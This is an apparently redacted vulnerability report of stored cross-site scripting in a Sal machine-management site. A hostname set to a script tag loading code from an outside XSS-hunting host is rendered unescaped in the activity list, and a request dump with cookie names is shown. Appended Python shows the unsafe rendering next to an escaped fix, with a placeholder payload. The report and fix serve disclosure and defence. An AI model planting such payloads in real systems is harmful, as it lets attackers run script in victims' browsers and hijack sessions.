The page located at https://sal.██████.com/list/Activity/hour/all/0/ suffers from a Cross-site Scripting (XSS) vulnerability when a user has set their hostname on their machine to an XSS payload.
https://sal.██████.com/list/Activity/hour/all/0/
███████
https://sal.██████.com/
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
_ga=████████; _mkto_trk=id:███&token:_mch-█████.com-██████; _biz_uid=████████; _biz_nA=2; _biz_flagsA=%7B%22Version%22%3A1%2C%22Mkto%22%3A%221%22%7D; _biz_pendingA=%5B%5D; csrftoken=█████
><td><a href="/machine_detail/28/">███</a></td><td>██████████</td><td>2020-10-01 06:51 BST</td></tr><tr><td><a href="/machine_detail/17/">███████</a></td><td>██████</td><td>2020-10-01 06:50 BST</td></tr><tr><td><a href="/machine_detail/41/">"><script src="https://nahamsec.xss.ht"></script></a></td><td>bensdp</td><td>2020-10-01 06:49 BST</td></tr></tbody></table></div></div><div><div><div>██████</div></div><div>
Thanks,
Ben
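
The flaw reported above, seen from the fixing side, as an added example that is not part of the original report or the application's own code: a client-reported hostname written into the machine-list row unescaped, next to the same row with output encoding. The function names, the sample hostname and the RFC 1123 ingest check are assumptions made for illustration; the ingest check can reject legitimate computer names that contain spaces, so output escaping is the fix that must always be present.

```python
import html
import re

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# 1-63 characters each, no leading or trailing hyphen, 253 characters overall.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
_HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*\Z")


def is_valid_hostname(name: str) -> bool:
    """Ingest-time check (hypothetical helper): accept only RFC 1123 names."""
    return len(name) <= 253 and _HOSTNAME_RE.match(name) is not None


def render_row_unsafe(machine_id: int, hostname: str, user: str, seen: str) -> str:
    """The reported flaw: client-supplied strings concatenated into markup."""
    return (f'<tr><td><a href="/machine_detail/{machine_id}/">{hostname}</a></td>'
            f"<td>{user}</td><td>{seen}</td></tr>")


def render_row_safe(machine_id: int, hostname: str, user: str, seen: str) -> str:
    """Escape every client-supplied field at output time."""
    return (f'<tr><td><a href="/machine_detail/{int(machine_id)}/">'
            f"{html.escape(hostname)}</a></td>"
            f"<td>{html.escape(user)}</td><td>{html.escape(seen)}</td></tr>")


# Constructed sample input, shaped like the hostname shown in the report.
SAMPLE = '"><script src="https://example.invalid/x.js"></script>'

if __name__ == "__main__":
    print("valid hostname:", is_valid_hostname(SAMPLE))
    print("unsafe:", render_row_unsafe(41, SAMPLE, "bensdp", "2020-10-01 06:49 BST"))
    print("safe:  ", render_row_safe(41, SAMPLE, "bensdp", "2020-10-01 06:49 BST"))
```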